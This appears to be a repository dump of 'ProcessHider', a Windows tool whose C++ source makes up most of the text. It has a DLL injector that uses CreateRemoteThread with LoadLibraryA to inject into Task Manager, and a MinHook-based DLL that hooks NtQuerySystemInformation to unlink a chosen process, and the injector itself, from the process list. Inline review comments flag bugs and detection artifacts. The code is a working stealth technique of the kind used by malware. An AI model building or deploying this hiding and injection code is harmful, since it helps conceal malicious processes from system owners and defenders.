├── DLL_Injector
├── .gitignore
├── DLL_Injector.vcxproj
├── DLL_Injector.vcxproj.filters
├── DLL_Injector.vcxproj.user
└── main.cpp
├── ProcessHider.sln
├── ProcessHider
├── .gitignore
├── ProcessHider.vcxproj
├── ProcessHider.vcxproj.filters
├── ProcessHider.vcxproj.user
├── main.cpp
└── nt_structs.h
├── README.md
└── include
├── .gitattributes
├── MinHook.h
└── libMinHook.x64.lib
/DLL_Injector/.gitignore:
--------------------------------------------------------------------------------
1 | /Debug
2 | /Release
3 | /x64
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}
23 | Win32Proj
24 | DLL_Injector
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/DLL_Injector/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | using namespace std;
7 | HANDLE map;  // Handle to the named file mapping; set in map_process_name(), closed in main() on "quit".
8 | LPVOID buf;  // Mapped view of that mapping; map_process_name() copies the process name to hide into it.
9 |
10 | bool inject_dll(DWORD pid, string dll_path) {  // Makes process `pid` load the DLL at dll_path: writes the path into the target and starts a remote thread at LoadLibraryA.
11 | // Returns false only from the OpenProcess and VirtualAllocEx checks; later failures are at most logged and the function still returns true.
12 | HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);  // Full-access handle to another process; this request is visible to process-access telemetry (e.g. Sysmon ProcessAccess events).
13 | if (handle == INVALID_HANDLE_VALUE) {  // NOTE(review): OpenProcess is documented to return NULL on failure, so this comparison does not detect a failed open.
14 | cout << " [-] Open Process Failed" << endl;
15 | return false;
16 | }
17 | else { cout << " [+] Got a Handle to the Remote Process" << endl; }  // Printed whenever the check above did not fire; not proof that the handle is valid.
18 |
19 | LPVOID address = VirtualAllocEx(handle, NULL, dll_path.length() , MEM_COMMIT | MEM_RESERVE,
20 | PAGE_EXECUTE_READWRITE);  // Buffer inside the target sized to the path length; a cross-process allocation with write+execute protection is an indicator memory-scanning defences can key on.
21 | if (address == NULL) {
22 | cout << " [-] VirtualAllocEx Failed" << endl;
23 | return false;  // `handle` is not closed on this path.
24 | }
25 |
26 | bool res = WriteProcessMemory(handle, address, dll_path.c_str(), dll_path.length(), 0);  // Copies the path bytes into the target; the bytes-written out-parameter is not requested.
27 | if (!res) {
28 | cout << " [-] WriteProcessMemory Failed" << endl;  // Logged only; execution continues to CreateRemoteThread.
29 | }
30 | if (CreateRemoteThread(handle, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)address, NULL, NULL) == INVALID_HANDLE_VALUE) {  // Remote thread starting at LoadLibraryA with the remote path buffer as argument: the classic DLL-injection pattern surfaced by remote-thread telemetry (e.g. Sysmon CreateRemoteThread events). NOTE(review): failure is reported as NULL, not INVALID_HANDLE_VALUE, and the returned thread handle is never closed.
31 | cout << " [-] CreateRemoteThread Failed" << endl;
32 | }
33 | else { cout << " [+] DLL Loaded Into Remote Process" << endl; }  // Means only that the comparison above was false; the code never waits for the thread or checks the load result.
34 |
35 | cout << " [+] Process Hidden" << endl << endl;  // Printed unconditionally, whatever happened above.
36 | CloseHandle(handle);
37 | return true;
38 | }
39 |
40 | void find_and_inject()  // Polling loop started on a background thread by main(): once a second it scans the process list and calls inject_dll() on any Taskmgr.exe whose PID differs from the last one injected.
41 | {
42 | char* dll_path_c = (char*)malloc(sizeof(char) * 3000);  // Unchecked allocation, never freed.
43 | GetModuleFileNameA(NULL, dll_path_c, 3000);  // Full path of the running injector executable; return value ignored.
44 |
45 | DWORD lastpid = 4;  // PID most recently injected; starts at 4, presumably because that PID belongs to the System process — confirm.
46 | string dll_path(dll_path_c);
47 | size_t index = dll_path.find_last_of('\\');
48 | dll_path.erase(dll_path.begin() + index, dll_path.end());  // Drop the executable's file name, keeping its directory.
49 | dll_path.append("\\ProcessHider.dll");  // The DLL is therefore expected next to the injector executable.
50 |
51 | while (true) { // Keep running to check if TM closes and reopens, if yes then inject again
52 | PROCESSENTRY32 process;
53 | process.dwSize = sizeof(PROCESSENTRY32);
54 |
55 | HANDLE proc_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);  // Fresh snapshot of all processes on every iteration.
56 | if (proc_snap == INVALID_HANDLE_VALUE) {
57 | cout << " [-] CreateToolhelp32Snapshot Failed" << endl;
58 | return;  // Ends the polling thread.
59 | }
60 |
61 | if (!Process32First(proc_snap, &process)) {
62 | cout << " [-] Process32First Failed" << endl;
63 | return;  // Ends the polling thread; proc_snap is not closed on this path.
64 | }
65 |
66 | do
67 | {
68 | if (!lstrcmp(process.szExeFile, L"Taskmgr.exe") && lastpid != process.th32ProcessID) {  // Case-sensitive match on the image file name alone; nothing else about the process is checked.
69 | cout << " [+] Task Manager Detected" << endl;
70 | if (!inject_dll(process.th32ProcessID, dll_path)) {
71 | cout << " [-] Unable to Inject DLL!! Check if you are running as Admin" << endl << endl;
72 | break;  // Leaves only the do/while; lastpid is unchanged, so the outer loop tries again after the sleep.
73 | }
74 | lastpid = process.th32ProcessID;
75 | }
76 | } while (Process32Next(proc_snap, &process));
77 | CloseHandle(proc_snap);
78 | Sleep(1000);  // One-second polling interval.
79 | }
80 | }
81 |
82 | bool map_process_name(string process) {  // Publishes the name of the process to hide through a named shared-memory section that the injected DLL opens by name.
83 | map = CreateFileMappingA(
84 | INVALID_HANDLE_VALUE,  // No backing file: the section is backed by the system paging file.
85 | NULL,  // Default security attributes.
86 | PAGE_READWRITE,
87 | 0,
88 | 255,  // Requested section size in bytes.
89 | "Global\\GetProcessName"  // Fixed object name; a stable host artifact to look for when investigating this tool.
90 | );
91 |
92 | if (map == NULL) {
93 | cout << "CreateFileMapping Failed" << endl;
94 | return false;
95 | }
96 |
97 | buf = MapViewOfFile(map,
98 | FILE_MAP_ALL_ACCESS,
99 | 0,
100 | 0,
101 | 255);
102 |
103 | if (buf == NULL) {
104 | cout << "MapViewOfFile Failed" << endl;
105 | CloseHandle(map);
106 | return 0;  // Same as false.
107 | }
108 |
109 | CopyMemory(buf, process.c_str(), process.length());  // Copies length() bytes: no terminating NUL, and no check against the 255-byte size requested above.
110 | }  // NOTE(review): no return statement on the success path; flowing off the end of a non-void function is undefined behaviour.
111 |
112 | int main()  // Console entry point: asks for the process name to hide, publishes it via map_process_name(), then runs find_and_inject() on a background thread until "quit" is typed.
113 | {
114 | string process, inp;
115 | cout << " Enter Process Name To Hide" << endl << "--> ";
116 | cin >> process;  // Reads a single whitespace-delimited token.
117 | cout << endl;
118 | map_process_name(process);  // Result ignored: the polling thread is started even if the shared section could not be created.
119 |
120 | CreateThread(  // Returned thread handle is discarded.
121 | NULL,
122 | NULL,
123 | (LPTHREAD_START_ROUTINE)find_and_inject,  // The cast hides a signature mismatch: find_and_inject is declared void(), not DWORD WINAPI(LPVOID).
124 | NULL,
125 | NULL,
126 | NULL
127 | );
128 |
129 | cout << "Enter \"quit\" to Quit or Keep this running to inject into future task manager processes" << endl << endl;
130 | while (true) {
131 | cin >> inp;
132 | if (inp == "quit") {
133 | UnmapViewOfFile(buf);
134 | CloseHandle(map);
135 | ExitProcess(0);  // Ends this process and its polling thread; nothing here unloads the DLL from processes already injected.
136 | }
137 | }
138 |
139 | return 0;  // Unreachable: the loop above is left only through ExitProcess.
140 | }
--------------------------------------------------------------------------------
/ProcessHider.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHider", "ProcessHider\ProcessHider.vcxproj", "{EE6E876F-F989-4AC2-BA2F-55348E03519C}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLL_Injector", "DLL_Injector\DLL_Injector.vcxproj", "{8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.ActiveCfg = Debug|x64
19 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.Build.0 = Debug|x64
20 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.ActiveCfg = Debug|Win32
21 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.Build.0 = Debug|Win32
22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.ActiveCfg = Release|x64
23 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.Build.0 = Release|x64
24 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.ActiveCfg = Release|Win32
25 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.Build.0 = Release|Win32
26 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.ActiveCfg = Debug|x64
27 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.Build.0 = Debug|x64
28 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.ActiveCfg = Debug|Win32
29 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.Build.0 = Debug|Win32
30 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.ActiveCfg = Release|x64
31 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.Build.0 = Release|x64
32 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.ActiveCfg = Release|Win32
33 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | EndGlobal
39 |
--------------------------------------------------------------------------------
/ProcessHider/.gitignore:
--------------------------------------------------------------------------------
1 | /Debug
2 | /Release
3 | /x64
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}
23 | Win32Proj
24 | ProcessHider
25 | 8.1
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Windows
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Windows
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Windows
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
139 | true
140 | MultiThreaded
141 |
142 |
143 | Windows
144 | true
145 | true
146 | true
147 | ../include/libMinHook.x64.lib;%(AdditionalDependencies)
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ProcessHider/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include "..\include\MinHook.h"
3 | #include "nt_structs.h"
4 |
5 | #pragma comment(lib, "libMinHook.x64.lib")
6 |
7 | PNT_QUERY_SYSTEM_INFORMATION Original_NtQuerySystemInformation;  // Address of ntdll's NtQuerySystemInformation (the hook target), resolved in set_nt_hook().
8 | PNT_QUERY_SYSTEM_INFORMATION New_NtQuerySystemInformation;  // Despite the name, this receives MinHook's trampoline, i.e. the pointer used to call the unhooked function.
9 | wchar_t* process;  // Wide-character name of the process to filter out; allocated and filled in get_process_name().
10 |
11 | NTSTATUS WINAPI Hooked_NtQuerySystemInformation(  // Detour installed over NtQuerySystemInformation: forwards the call, then edits SystemProcessInformation results so selected records are skipped.
12 | SYSTEM_INFORMATION_CLASS SystemInformationClass,
13 | PVOID SystemInformation,
14 | ULONG SystemInformationLength,
15 | PULONG ReturnLength)
16 | {  // Only callers inside the process this DLL is loaded into are affected; the filtered process itself is not touched.
17 | NTSTATUS stat = New_NtQuerySystemInformation(  // Call through the trampoline so the real query runs first.
18 | SystemInformationClass,
19 | SystemInformation,
20 | SystemInformationLength,
21 | ReturnLength);
22 |
23 | if (SystemProcessInformation == SystemInformationClass && stat == 0)  // Only successful process-list queries are modified; every other information class passes through unchanged.
24 | {
25 | P_SYSTEM_PROCESS_INFORMATION prev = P_SYSTEM_PROCESS_INFORMATION(SystemInformation);  // First record in the caller's buffer.
26 | P_SYSTEM_PROCESS_INFORMATION curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)prev + prev->NextEntryOffset);  // Second record; the first record's name is therefore never compared.
27 |
28 | while (prev->NextEntryOffset != NULL) {  // A NextEntryOffset of 0 ends the walk.
29 | if (!lstrcmp(curr->ImageName.Buffer, process)) {  // Exact, case-sensitive name match. NOTE(review): DllMain fills `process` after the hook is enabled, so an early call may see it unset — confirm.
30 | if (curr->NextEntryOffset == 0) {
31 | prev->NextEntryOffset = 0; // matched record is the last one: end the list at prev
32 | }
33 | else {
34 | prev->NextEntryOffset += curr->NextEntryOffset;  // Make prev jump over curr; the skipped record's bytes stay in the buffer, only the chain no longer reaches them.
35 | }
36 | curr = prev;
37 | }
38 | if (!lstrcmp(curr->ImageName.Buffer, L"DLL_Injector.exe")) {  // Same unlinking for the injector's own image name, which is hard-coded here.
39 | if (curr->NextEntryOffset == 0) {
40 | prev->NextEntryOffset = 0;
41 | }
42 | else {
43 | prev->NextEntryOffset += curr->NextEntryOffset;
44 | }
45 | curr = prev;
46 | }
47 | prev = curr;
48 | curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)curr + curr->NextEntryOffset);  // Advance using the (possibly rewritten) offset.
49 | }
50 | }
51 |
52 | return stat;  // The caller gets the real status together with the edited buffer.
53 | }
54 |
55 | bool set_nt_hook()  // Creates and enables the MinHook detour on ntdll's NtQuerySystemInformation; returns false if any MinHook call fails.
56 | {
57 | HMODULE ntdll = GetModuleHandle(L"ntdll.dll");  // Result not checked for NULL.
58 |
59 | Original_NtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(ntdll, "NtQuerySystemInformation");  // Result not checked for NULL before it is handed to MinHook.
60 |
61 | if (MH_Initialize() != MH_OK) { return false; }
62 |
63 | if(MH_CreateHook(Original_NtQuerySystemInformation, &Hooked_NtQuerySystemInformation,
64 | (LPVOID*) &New_NtQuerySystemInformation) != MH_OK) { return false; }  // Hook is created in disabled state; New_NtQuerySystemInformation receives the trampoline.
65 |
66 | if (MH_EnableHook(Original_NtQuerySystemInformation) != MH_OK) { return false; }  // From here the detour is live. MinHook patches the target's code in memory, so comparing the loaded ntdll code with the on-disk image is one way to spot the hook.
67 |
68 | return true;
69 | }
70 |
71 | void get_process_name() {  // Reads the name to hide from the "Global\\GetProcessName" section and stores it, converted to wide characters, in the global `process`.
72 | HANDLE map = OpenFileMappingA(  // Result not checked; OpenFileMapping returns NULL when the named section cannot be opened.
73 | FILE_MAP_ALL_ACCESS,
74 | FALSE,
75 | "Global\\GetProcessName"
76 | );
77 |
78 | LPVOID buf = MapViewOfFile(map, // handle to map object
79 | FILE_MAP_ALL_ACCESS, // read/write permission
80 | 0,
81 | 0,
82 | 255);  // Result not checked for NULL either.
83 |
84 | process = (wchar_t*)malloc(255 * sizeof(wchar_t));  // Unchecked allocation; never freed in this file.
85 | MultiByteToWideChar(CP_UTF8, 0, (char*)buf, -1, process, 255);  // -1 means the source is read up to a NUL terminator; the content is whatever the section's creator wrote and is not validated.
86 |
87 | UnmapViewOfFile(buf);
88 | CloseHandle(map);
89 | }
90 |
91 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)  // DLL entry point: installs the hook when the DLL is loaded into a process and removes it when the DLL is unloaded.
92 | {
93 | switch(fdwReason)
94 | {
95 | case DLL_PROCESS_ATTACH:  // NOTE(review): this work runs inside DllMain, which the loader calls while holding the loader lock — confirm the calls below are safe there.
96 | if (!set_nt_hook()) {
97 | return FALSE;  // Returning FALSE on attach makes the load fail.
98 | }
99 | get_process_name();  // Runs after the hook is already enabled, so `process` is still unset for any hooked call made before this returns.
100 | break;
101 | case DLL_PROCESS_DETACH:
102 | MH_DisableHook(Original_NtQuerySystemInformation);  // Return value ignored.
103 | MH_Uninitialize();  // Return value ignored.
104 | break;
105 | }
106 |
107 | return TRUE;
108 | }
--------------------------------------------------------------------------------
/ProcessHider/nt_structs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | typedef NTSTATUS(WINAPI *PNT_QUERY_SYSTEM_INFORMATION)(  // Function-pointer type with the same parameter list as Hooked_NtQuerySystemInformation in main.cpp; used there for the hook target and the trampoline.
5 | SYSTEM_INFORMATION_CLASS SystemInformationClass,
6 | PVOID SystemInformation,
7 | ULONG SystemInformationLength,
8 | PULONG ReturnLength
9 | );
10 |
11 | typedef struct __SYSTEM_PROCESS_INFORMATION {  // Project-local layout of one process record in a SystemProcessInformation result; main.cpp reads only NextEntryOffset and ImageName. NOTE(review): field order and sizes must match what the OS returns — verify against the Windows versions in use.
12 | ULONG NextEntryOffset;  // Byte offset from this record to the next one; main.cpp treats 0 as the end of the list.
13 | ULONG NumberOfThreads;
14 | LARGE_INTEGER WorkingSetPrivateSize;
15 | ULONG HardFaultCount;
16 | ULONG NumberOfThreadsHighWatermark;
17 | ULONGLONG CycleTime;
18 | LARGE_INTEGER CreateTime;
19 | LARGE_INTEGER UserTime;
20 | LARGE_INTEGER KernelTime;
21 | UNICODE_STRING ImageName;  // Process image name; main.cpp compares ImageName.Buffer with lstrcmp.
22 | LONG BasePriority;
23 | PVOID UniqueProcessId;
24 | PVOID InheritedFromUniqueProcessId;
25 | ULONG HandleCount;
26 | ULONG SessionId;
27 | ULONG_PTR UniqueProcessKey;
28 | ULONG_PTR PeakVirtualSize;
29 | ULONG_PTR VirtualSize;
30 | ULONG PageFaultCount;
31 | ULONG_PTR PeakWorkingSetSize;
32 | ULONG_PTR WorkingSetSize;
33 | ULONG_PTR QuotaPeakPagedPoolUsage;
34 | ULONG_PTR QuotaPagedPoolUsage;
35 | ULONG_PTR QuotaPeakNonPagedPoolUsage;
36 | ULONG_PTR QuotaNonPagedPoolUsage;
37 | ULONG_PTR PagefileUsage;
38 | ULONG_PTR PeakPagefileUsage;
39 | ULONG_PTR PrivatePageCount;
40 | LARGE_INTEGER ReadOperationCount;
41 | LARGE_INTEGER WriteOperationCount;
42 | LARGE_INTEGER OtherOperationCount;
43 | LARGE_INTEGER ReadTransferCount;
44 | LARGE_INTEGER WriteTransferCount;
45 | LARGE_INTEGER OtherTransferCount;
46 | } S_SYSTEM_PROCESS_INFORMATION, *P_SYSTEM_PROCESS_INFORMATION;
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ProcessHider
2 |
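3 | ProcessHider uses Windows API hooking to hide a process from Task Manager. It uses the MinHook library to hook the NtQuerySystemInformation function inside the Task Manager process, so whenever Task Manager calls NtQuerySystemInformation the hook runs and removes the chosen process from the process list returned by the original function. The hook is a user-mode patch that exists only in the process the DLL is loaded into: the hidden process keeps running and stays visible to any tool or sensor that does not enumerate processes through that hooked copy of the function.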
4 |
5 | The repo contains two projects. The main one, ProcessHider, builds the DLL that is injected into Task Manager. The second, DLL_Injector, injects that DLL and passes it the name of the process to hide.
6 |
7 | ## To Compile:
8 | Clone the repo and open the solution file (`ProcessHider.sln`) in Visual Studio.
9 |
--------------------------------------------------------------------------------
/include/.gitattributes:
--------------------------------------------------------------------------------
1 | *.h text
2 | *.lib binary
3 |
--------------------------------------------------------------------------------
/include/MinHook.h:
--------------------------------------------------------------------------------
1 | /*
2 | * MinHook - The Minimalistic API Hooking Library for x64/x86
3 | * Copyright (C) 2009-2017 Tsuda Kageyu.
4 | * All rights reserved.
5 | *
6 | * Redistribution and use in source and binary forms, with or without
7 | * modification, are permitted provided that the following conditions
8 | * are met:
9 | *
10 | * 1. Redistributions of source code must retain the above copyright
11 | * notice, this list of conditions and the following disclaimer.
12 | * 2. Redistributions in binary form must reproduce the above copyright
13 | * notice, this list of conditions and the following disclaimer in the
14 | * documentation and/or other materials provided with the distribution.
15 | *
16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER
20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
27 | */
28 |
29 | #pragma once
30 |
31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__)
32 | #error MinHook supports only x86 and x64 systems.
33 | #endif
34 |
35 | #include
36 |
37 | // MinHook Error Codes.
38 | typedef enum MH_STATUS
39 | {
40 | // Unknown error. Should not be returned.
41 | MH_UNKNOWN = -1,
42 |
43 | // Successful.
44 | MH_OK = 0,
45 |
46 | // MinHook is already initialized.
47 | MH_ERROR_ALREADY_INITIALIZED,
48 |
49 | // MinHook is not initialized yet, or already uninitialized.
50 | MH_ERROR_NOT_INITIALIZED,
51 |
52 | // The hook for the specified target function is already created.
53 | MH_ERROR_ALREADY_CREATED,
54 |
55 | // The hook for the specified target function is not created yet.
56 | MH_ERROR_NOT_CREATED,
57 |
58 | // The hook for the specified target function is already enabled.
59 | MH_ERROR_ENABLED,
60 |
61 | // The hook for the specified target function is not enabled yet, or already
62 | // disabled.
63 | MH_ERROR_DISABLED,
64 |
65 | // The specified pointer is invalid. It points the address of non-allocated
66 | // and/or non-executable region.
67 | MH_ERROR_NOT_EXECUTABLE,
68 |
69 | // The specified target function cannot be hooked.
70 | MH_ERROR_UNSUPPORTED_FUNCTION,
71 |
72 | // Failed to allocate memory.
73 | MH_ERROR_MEMORY_ALLOC,
74 |
75 | // Failed to change the memory protection.
76 | MH_ERROR_MEMORY_PROTECT,
77 |
78 | // The specified module is not loaded.
79 | MH_ERROR_MODULE_NOT_FOUND,
80 |
81 | // The specified function is not found.
82 | MH_ERROR_FUNCTION_NOT_FOUND
83 | }
84 | MH_STATUS;
85 |
86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook,
87 | // MH_QueueEnableHook or MH_QueueDisableHook.
88 | #define MH_ALL_HOOKS NULL
89 |
90 | #ifdef __cplusplus
91 | extern "C" {
92 | #endif
93 |
94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE
95 | // at the beginning of your program.
96 | MH_STATUS WINAPI MH_Initialize(VOID);
97 |
98 | // Uninitialize the MinHook library. You must call this function EXACTLY
99 | // ONCE at the end of your program.
100 | MH_STATUS WINAPI MH_Uninitialize(VOID);
101 |
102 | // Creates a Hook for the specified target function, in disabled state.
103 | // Parameters:
104 | // pTarget [in] A pointer to the target function, which will be
105 | // overridden by the detour function.
106 | // pDetour [in] A pointer to the detour function, which will override
107 | // the target function.
108 | // ppOriginal [out] A pointer to the trampoline function, which will be
109 | // used to call the original target function.
110 | // This parameter can be NULL.
111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal);
112 |
113 | // Creates a Hook for the specified API function, in disabled state.
114 | // Parameters:
115 | // pszModule [in] A pointer to the loaded module name which contains the
116 | // target function.
117 | // pszProcName [in] A pointer to the target function name, which will be
118 | // overridden by the detour function.
119 | // pDetour [in] A pointer to the detour function, which will override
120 | // the target function.
121 | // ppOriginal [out] A pointer to the trampoline function, which will be
122 | // used to call the original target function.
123 | // This parameter can be NULL.
124 | MH_STATUS WINAPI MH_CreateHookApi(
125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal);
126 |
